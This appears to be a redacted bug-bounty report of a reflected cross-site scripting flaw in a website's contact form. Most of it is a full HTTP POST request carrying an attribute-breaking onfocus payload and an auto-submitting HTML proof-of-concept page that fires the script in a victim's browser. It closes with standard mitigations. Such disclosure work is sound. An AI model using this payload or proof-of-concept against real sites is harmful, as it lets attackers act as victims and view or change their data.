I found Reflected XSS on https://███/contact-us/#.YsSAGCNBzaQ.
The parameters in the contact form are not properly filtered, leading to possible insertion of "
characters and javascript execution
Perform any action within the application that the user can perform.
View any information that the user is able to view.
Modify any information that the user is able to modify.
Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
███████
POST /contact-us/ HTTP/1.1
Host: ███████
Cookie: wire=kh92hb67grih1376an7igoeo39; _ga_877MBKEB9K=GS1.1.1657044258.1.1.1657044351.0; _ga=GA1.2.58467857.1657044259; __atuvc=2%7C27; __atuvs=62c47d237cd3f8d9001; __atrfs=ab/|pos/|tot/|rsi/62c47d0400000000|cfc/|hash/0|rsiq/|fuid/d2cfdda4|rxi/|rsc/addressbar|gen/1|csi/|dr/; _gid=GA1.2.2089900381.1657044260; wires=cqr7lhfhfudpdntime6mevkslt; _gat_gtag_UA_377760_26=1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: https://██████
Referer: https://████████/contact-us/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
name="%20onfocus=alert('tmz900')%20autofocus//"&email=test%40gmail.com&phone=1234567895&message=test&submitted=submitted&g-recaptcha-response=
█████████
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://████/contact-us/" method="POST">
<input type="hidden" name="name" value="" onfocus=alert('tmz900') autofocus//"" />
<input type="hidden" name="email" value="test@gmail.com" />
<input type="hidden" name="phone" value="1234567895" />
<input type="hidden" name="message" value="test" />
<input type="hidden" name="submitted" value="submitted" />
<input type="hidden" name="g-recaptcha-response" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Filter input on arrival
Encode data on output
Use appropriate response headers
Content Security Policy.